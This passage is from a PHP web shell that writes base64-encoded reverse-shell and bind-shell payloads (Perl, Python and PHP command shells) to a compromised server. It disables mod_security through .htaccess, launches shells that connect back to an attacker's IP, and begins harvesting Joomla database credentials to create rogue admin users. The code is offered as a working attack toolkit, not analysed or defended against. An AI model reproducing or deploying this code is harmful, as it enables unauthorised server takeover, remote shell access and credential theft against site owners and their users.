yYWRpZW50KHRvIGJvdHRvbSwgI2VhZWFlYSwgI2QwZDBkMCk7ICAtd2Via2l0LWJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyAgYm94LXNoYWRvdzogaW5zZXQgMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjUpLCBpbnNldCAwIDAgN3B4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC40KSwgMCAxcHggMXB4IHJnYmEoMCwgMCwgMCwgMC4xNSk7IH0gaW5wdXRbdHlwZT10ZXh0XXsgcGFkZGluZzogM3B4OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6ICM3Nzc3NzcgMHB4IDBweCAzcHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDA3NzAwOyAgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LDg1LDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7fSBpbnB1dFt0eXBlPXN1Ym1pdF06aG92ZXIsIGlucHV0W3R5cGU9dGV4dF06aG92ZXJ7IGNvbG9yOiAjZmZmZmZmOyB0ZXh0LXNoYWRvdzogIzAwNjYwMCAwcHggMHB4IDRweDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4O30gc2VsZWN0eyBwYWRkaW5nOiAzcHg7IHdpZHRoOiAxNjJweDsgY29sb3I6ICMwMGFhMDA7IHRleHQtc2hhZG93OiMwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogMXB4IHNvbGlkICMwMDc3MDA7IGJhY2tncm91bmQ6IHRyYW5zcGFyZW50OyB0ZXh0LWRlY29yYXRpb246IG5vbmU7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGFhMDA7ICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiKDg1LCA4NSwgODUpIDBweCAwcHggNHB4O30gc2VsZWN0OmhvdmVyeyBib3JkZXI6IDFweCBzb2xpZCAjMDBkZDAwOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBkZDAwOyAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9ICAgI2NvbW1hbmRzeyBtYXJnaW4tbGVmdDogMzUwcHg7IG1hcmdpbi1yaWdodDogMzUwcHg7IH0gb3B0aW9ueyBjb2xvcjogIzc3Nzc3NzsgfTwvc3R5bGU+DQo8P3BocA0KZWNobyAnPGNlbnRlcj48Zm9udCBjb2xvcj0iIzAwNzcwMCIgZmFjZT0iVGFob21hIiBzdHlsZT0iZm9udC1zaXplOiAxMnB0Ij5Vc2FnZTogcmV2ZXJzZXNoLnB5IFtpcG11XSBbUG9ydG11XTwvZm9udD4nOw0KZWNobyc8cCBhbGlnbj0iY2VudGVyIj4gDQo8aW1nIGJvcmRlcj0iMCI+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDk5MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8cD48dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT48L3A+DQo8cD48Y2VudGVyPklmIG5vdGhpbmcgd29yayBpdCBtZWFucyB0aGF0IHB5dGhvbiBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcHl0aG9uIHJldmVyc2UucHkgeW91cklQIFBvcnQ8L3N0cm9uZz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT0idnciIHNpemU9IjUwIiB2YWx1ZT0iY21kIj4gPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIHNpemU9IjQzIj4gPHNlbGVjdCBuYW1lPWV4ZWNtZXRob2Q+DQo8b3B0aW9uIHZhbHVlPSJzeXN0ZW0iPlN5c3RlbTwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0iZXhlYyI+RXhlYzwvb3B0aW9uPiAgPG9wdGlvbiB2YWx1ZT0icGFzc3RocnUiPlBhc3N0aHJ1PC9vcHRpb24+PG9wdGlvbiB2YWx1ZT0icG9wZW4iPnBvcGVuPC9vcHRpb24+DQo8L3NlbGVjdD4gPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkV4ZWN1dGUiPg0KPC9wPjwvZm9ybT4nOw0KPz4=';
1972. $file = fopen("kiter.php" ,"w+");
1973. $write = fwrite ($file ,base64_decode($merdeeeee));
1974. fclose($file);
1975. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Python Connect Shell Priv8</span><center><center><br><iframe src=pyrevrshell/kiter.php width=75% height=70% frameborder=0></iframe></div></center>';
1976. }
1977. elseif($_GET['do'] == 'pbc') {
1978. echo "<center>";
1979. echo "<ul>";
1980. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1981. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1982. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1983. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1984. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1985. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1986. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1987. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1988. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1989. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1990. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1991. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1992. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1993. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1994. echo "</ul>";
1995. echo "</center>";
1996. mkdir('Backperlrev', 0755);
1997. chdir('Backperlrev');
1998. $kokwkwkwkwkw = ".htaccess";
1999. $wkwkwkwkw_adi = "$kokwkwkwkwkw";
2000. $wkwkwkwkw = fopen ($wkwkwkwkw_adi , 'w') or die ("wkwkwkwkw a&#231;&#305;lamad&#305;!");
2001. $zilzil = "<IfModule mod_security.c>
2002. SecFilterEngine Off
2003. SecFilterScanPOST Off
2004. </IfModule>";
2005. fwrite ( $wkwkwkwkw , $zilzil ) ;
2006. fclose ($wkwkwkwkw);
2007. $shellololol = 'dXNlIElPOjpTb2NrZXQ7DQokc3lzdGVtICA9ICcvYmluL2Jhc2gnOw0KJEFSR0M9QEFSR1Y7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUlxuXG4iOw0KaWYgKCRBUkdDIT0yKSB7DQogICBwcmludCAiVXNhZ2U6ICQwIFtIb3N0XSBbUG9ydF0gXG5cbiI7DQogICBkaWUgIkV4OiAkMCAxMjcuMC4wLjEgMjEyMSBcbiI7DQp9DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0IDooXG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdCA6KFxuIjsNCnByaW50ICJbKl0gUmVzb2x2aW5nIEhvc3ROYW1lXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0aW5nLi4uICRBUkdWWzBdIFxuIjsNCnByaW50ICJbKl0gU3Bhd25pbmcgU2hlbGwgXG4iOw0KcHJpbnQgIlsqXSBDb25uZWN0ZWQgdG8gcmVtb3RlIGhvc3QgXCEvIFxuIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiQW5vbkdob3N0IEJBQ0stQ09OTkVDVCBCQUNLRE9PUiAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVDtlY2hvIC0tPT1TeXN0ZW1pbmZvPT0tLTsgdW5hbWUgLWE7ZWNobzsNCmVjaG8gLS09PVVzZXJpbmZvPT0tLTsgaWQ7ZWNobztlY2hvIC0tPT1EaXJlY3Rvcnk9PS0tOyBwd2Q7ZWNobzsgZWNobyAtLT09U2hlbGw9PS0tICIpOw0Kc3lzdGVtKCRzeXN0ZW0pOw==';
2008.  
2009. $zerer = fopen("reverse.pl" ,"w+");
2010. $write = fwrite ($zerer ,base64_decode($shellololol));
2011. fclose($zerer);
2012. chmod("reverse.pl",0755);
2013.  
2014. //extract php command shell
2015. $zonop = 'PGh0bWw+PGhlYWQ+PHRpdGxlPkFub25HaG9zdCBQZXJsIENvbm5lY3QgU2hlbGwgUHJpdjg8L3RpdGxlPjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cDovL3d3dzE0LjB6ejAuY29tLzIwMTQvMDYvMDQvMjEvMzk2NTU0Mzk0LnBuZyIgdHlwZT0iaW1hZ2UveC1pY29uIiAvPjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+DQpib2R5eyBiYWNrZ3JvdW5kLWNvbG9yOiB0cmFuc3BhcmVudCAhaW1wb3J0YW50OyBjb2xvcjogIzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwMCAwcHggMnB4IDdweDt9ICAgICAgYXt0ZXh0LWRlY29yYXRpb246bm9uZTsgZm9udC1mYW1pbHk6IFRhaG9tYSwgR2VuZXZhOyBjb2xvcjojMDA3NzAwOyBwYWRkaW5nOjJweCAycHg7fSAgICAgIGE6aG92ZXJ7Y29sb3I6IzAwOTkwMDsgdGV4dC1zaGFkb3c6IzAwZmYwMCAwcHggMHB4IDNweDt9CSAgLmFyZWEgeyBjb2xvcjogIzAwYmIwMDsgZm9udC1zaXplOiA5cHQ7IHRleHQtc2hhZG93OiMwMDAwMDAgMHB4IDJweCA3cHg7IGJvcmRlcjogc29saWQgMHB4ICMwMDc3MDA7IGJhY2tncm91bmQtY29sb3I6dHJhbnNwYXJlbnQ7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMDk5MDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoMCwxMTksMCkgMHB4IDBweCA0cHg7IH0JICBpbnB1dFt0eXBlPXN1Ym1pdF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDc3MDsgIGZvbnQtd2VpZ2h0OiBib2xkOyB0ZXh0LWFsaWduOiBjZW50ZXI7ICB0ZXh0LXNoYWRvdzogMCAxcHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjMpOyAgYmFja2dyb3VuZDogI2FlYWVhZTsgIGJhY2tncm91bmQtY2xpcDogcGFkZGluZy1ib3g7ICBib3JkZXI6IDFweCBzb2xpZCAjMjg0NDczOyAgYm9yZGVyLWJvdHRvbS1jb2xvcjogIzIyM2I2NjsgIGJvcmRlci1yYWRpdXM6IDRweDsgIGN1cnNvcjogcG9pbnRlcjsgIGJhY2tncm91bmQtaW1hZ2U6LXdlYmtpdC1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IC1tb3otbGluZWFyLWdyYWRpZW50KHRvcCwgI2VhZWFlYSwgI2QwZDBkMCk7ICBiYWNrZ3JvdW5kLWltYWdlOiAtby1saW5lYXItZ3JhZGllbnQodG9wLCAjZWFlYWVhLCAjZDBkMGQwKTsgIGJhY2tncm91bmQtaW1hZ2U6IGxpbmVhci1ncmFkaWVudCh0byBib3R0b20sICNlYWVhZWEsICNkMGQwZDApOyAgLXdlYmtpdC1ib3gtc2hhZG93OiBpbnNldCAwIDFweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNSksIGluc2V0IDAgMCA3cHggcmdiYSgyNTUsIDI1NSwgMjU1LCAwLjQpLCAwIDFweCAxcHggcmdiYSgwLCAwLCAwLCAwLjE1KTsgIGJveC1zaGFkb3c6IGluc2V0IDAgMXB4IHJnYmEoMjU1LCAyNTUsIDI1NSwgMC41KSwgaW5zZXQgMCAwIDdweCByZ2JhKDI1NSwgMjU1LCAyNTUsIDAuNCksIDAgMXB4IDFweCByZ2JhKDAsIDAsIDAsIDAuMTUpOyB9IGlucHV0W3R5cGU9dGV4dF17IHBhZGRpbmc6IDNweDsgY29sb3I6ICMwMDk5MDA7IHRleHQtc2hhZG93OiAjNzc3Nzc3IDBweCAwcHggM3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwNzcwMDsgICAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSw4NSw4NSkgMHB4IDBweCA0cHg7ICAgLW1vei1ib3gtc2hhZG93OiByZ2IoODUsODUsODUpIDBweCAwcHggNHB4O30gaW5wdXRbdHlwZT1zdWJtaXRdOmhvdmVyLCBpbnB1dFt0eXBlPXRleHRdOmhvdmVyeyBjb2xvcjogI2ZmZmZmZjsgdGV4dC1zaGFkb3c6ICMwMDY2MDAgMHB4IDBweCA0cHg7IGJveC1zaGFkb3c6IDBweCAwcHggNHB4ICMwMGRkMDA7IGJvcmRlcjogMXB4IHNvbGlkICMwMGRkMDA7ICAgIHBhZGRpbmc6IDNweDsgICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDRweDsgICAtbW96LWJvcmRlci1yYWRpdXM6IDRweDsgICBib3JkZXItcmFkaXVzOiA0cHg7ICAgLXdlYmtpdC1ib3gtc2hhZG93OiByZ2JhKDAsMTE5LDApIDBweCAwcHggNHB4OyAgIC1tb3otYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDt9IHNlbGVjdHsgcGFkZGluZzogM3B4OyB3aWR0aDogMTYycHg7IGNvbG9yOiAjMDBhYTAwOyB0ZXh0LXNoYWRvdzojMDAwIDBweCAycHggN3B4OyBib3JkZXI6IDFweCBzb2xpZCAjMDA3NzAwOyBiYWNrZ3JvdW5kOiB0cmFuc3BhcmVudDsgdGV4dC1kZWNvcmF0aW9uOiBub25lOyBib3gtc2hhZG93OiAwcHggMHB4IDRweCAjMDBhYTAwOyAgcGFkZGluZzogM3B4OyAgIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNHB4OyAgIC1tb3otYm9yZGVyLXJhZGl1czogNHB4OyAgIGJvcmRlci1yYWRpdXM6IDRweDsgICAtd2Via2l0LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYig4NSwgODUsIDg1KSAwcHggMHB4IDRweDt9IHNlbGVjdDpob3ZlcnsgYm9yZGVyOiAxcHggc29saWQgIzAwZGQwMDsgYm94LXNoYWRvdzogMHB4IDBweCA0cHggIzAwZGQwMDsgICBwYWRkaW5nOiAzcHg7ICAgLXdlYmtpdC1ib3JkZXItcmFkaXVzOiA0cHg7ICAgLW1vei1ib3JkZXItcmFkaXVzOiA0cHg7ICAgYm9yZGVyLXJhZGl1czogNHB4OyAgIC13ZWJraXQtYm94LXNoYWRvdzogcmdiYSgwLDExOSwwKSAwcHggMHB4IDRweDsgICAtbW96LWJveC1zaGFkb3c6IHJnYmEoMCwxMTksMCkgMHB4IDBweCA0cHg7fSAgICNjb21tYW5kc3sgbWFyZ2luLWxlZnQ6IDM1MHB4OyBtYXJnaW4tcmlnaHQ6IDM1MHB4OyB9IG9wdGlvbnsgY29sb3I6ICM3Nzc3Nzc7IH08L3N0eWxlPg0KPD9waHANCmVjaG8gJzxjZW50ZXI+PGZvbnQgY29sb3I9IiMwMDc3MDAiIGZhY2U9IlRhaG9tYSIgc3R5bGU9ImZvbnQtc2l6ZTogMTFwdCI+VXNhZ2U6IHBlcmwgcmV2ZXJzZS5wbCBbaXBtdV0gW1BvcnRtdV08L2ZvbnQ+PGJyPic7DQplY2hvJzxwIGFsaWduPSJjZW50ZXIiPiANCjxpbWcgYm9yZGVyPSIwIiA+PC9wPjxmb250IGZhY2U9IkdlbmV2YSIgYWxpZ249ImNlbnRlciIgc2l6ZT0iMiIgY29sb3I9IiMwMDc3MDAiPiBDb2RlZCBCeSBNYXVyaXRhbmlhIEF0dGFja2VyIDwvZm9udD48YnI+DQo8Zm9ybSBtZXRob2Q9Z2V0IGFjdGlvbj0iJy4kbWUuJyI+DQo8dGV4dGFyZWEgY2xhc3M9ImFyZWEiIHJvd3M9IjEzIiBuYW1lPSJTMSIgY29scz0iNzAiID4nOw0KDQppZiAoc3RybGVuKCRfR0VUWydjb21tYW5kJ10pPjEgJiYgJF9HRVRbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfR0VUWydleGVjbWV0aG9kJ10oJF9HRVRbJ2NvbW1hbmQnXSk7fQ0KaWYgKHN0cmxlbigkX1BPU1RbJ2NvbW1hbmQnXSk+MSAmJiAkX1BPU1RbJ2V4ZWNtZXRob2QnXSE9InBvcGVuIil7DQplY2hvICRfUE9TVFsnZXhlY21ldGhvZCddKCRfUE9TVFsnY29tbWFuZCddKTt9DQoNCmlmIChzdHJsZW4oJF9HRVRbJ2NvbW1hbmQnXSk+MSAmJiAkX0dFVFsnZXhlY21ldGhvZCddPT0icG9wZW4iKXsNCnBvcGVuKCRfR0VUWydjb21tYW5kJ10sInIiKTt9DQoNCmVjaG8nPC90ZXh0YXJlYT4NCjxwPjxjZW50ZXI+SWYgbm90aGluZyB3b3JrIGl0IG1lYW5zIHRoYXQgcGVybCBpcyBub3QgZW5hYmxlZCBpbiB0aGlzIHNlcnZlciA6KDwvY2VudGVyPjwvcD4NCjxwIGFsaWduPSJjZW50ZXIiPjxzdHJvbmc+Q29tbWFuZDogcGVybCByZXZlcnNlLnBsIHlvdXJJUCBQb3J0PC9zdHJvbmc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9InZ3IiBzaXplPSI1MCIgdmFsdWU9ImNtZCI+IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjb21tYW5kIiBzaXplPSI0MyI+IDxzZWxlY3QgbmFtZT1leGVjbWV0aG9kPg0KPG9wdGlvbiB2YWx1ZT0ic3lzdGVtIj5TeXN0ZW08L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9ImV4ZWMiPkV4ZWM8L29wdGlvbj4gIDxvcHRpb24gdmFsdWU9InBhc3N0aHJ1Ij5QYXNzdGhydTwvb3B0aW9uPjxvcHRpb24gdmFsdWU9InBvcGVuIj5wb3Blbjwvb3B0aW9uPg0KPC9zZWxlY3Q+IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJFeGVjdXRlIj4NCjwvcD48L2Zvcm0+JzsNCj8+';
2016. $file = fopen("kit.php" ,"w+");
2017. $write = fwrite ($file ,base64_decode($zonop));
2018. fclose($file);
2019.  
2020. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:#009900'>Perl Connect Shell Priv8</span></b><center><br><iframe src=Backperlrev/kit.php width=75% height=60% frameborder=0></iframe></div></center>";
2021.  
2022. }
2023. elseif($_GET['do'] == 'bc') {
2024. echo "<center>";
2025. echo "<ul>";
2026. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
2027. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
2028. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
2029. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
2030. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
2031. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
2032. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
2033. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
2034. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
2035. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
2036. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
2037. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
2038. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
2039. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
2040. echo "</ul>";
2041. echo "</center>";
2042. echo "<form method='post'>
2043. <u>Bind Port:</u> <br>
2044. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
2045. <input type='submit' name='sub_bp' value='>>'>
2046. </form>
2047. <form method='post'>
2048. <u>Back Connect:</u> <br>
2049. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
2050. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
2051. <input type='submit' name='sub_bc' value='>>'>
2052. </form>";
2053. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
2054. if(isset($_POST['sub_bp'])) {
2055. $f_bp = fopen("/tmp/bp.pl", "w");
2056. fwrite($f_bp, base64_decode($bind_port_p));
2057. fclose($f_bp);
2058.  
2059. $port = $_POST['port_bind'];
2060. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
2061. sleep(1);
2062. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
2063. unlink("/tmp/bp.pl");
2064. }
2065. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
2066. if(isset($_POST['sub_bc'])) {
2067. $f_bc = fopen("/tmp/bc.pl", "w");
2068. fwrite($f_bc, base64_decode($bind_connect_p));
2069. fclose($f_bc);
2070.  
2071. $ipbc = $_POST['ip_bc'];
2072. $port = $_POST['port_bc'];
2073. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
2074. sleep(1);
2075. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
2076. unlink("/tmp/bc.pl");
2077. }
2078. }
2079. elseif($_GET['do'] == 'aeu') {
2080. if($_POST['hajar']) {
2081. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
2082. echo "username atau password harus lebih dari 6 karakter";
2083. } else {
2084. $user_baru = $_POST['user_baru'];
2085. $pass_baru = md5($_POST['pass_baru']);
2086. $conf = $_POST['config_dir'];
2087. $scan_conf = scandir($conf);
2088. foreach($scan_conf as $file_conf) {
2089. if(!is_file("$conf/$file_conf")) continue;
2090. $config = file_get_contents("$conf/$file_conf");
2091. if(preg_match("/JConfig|joomla/",$config)) {
2092. $dbhost = ambilkata($config,"host = '","'");
2093. $dbuser = ambilkata($config,"user = '","'");
2094. $dbpass = ambilkata($config,"password = '","'");
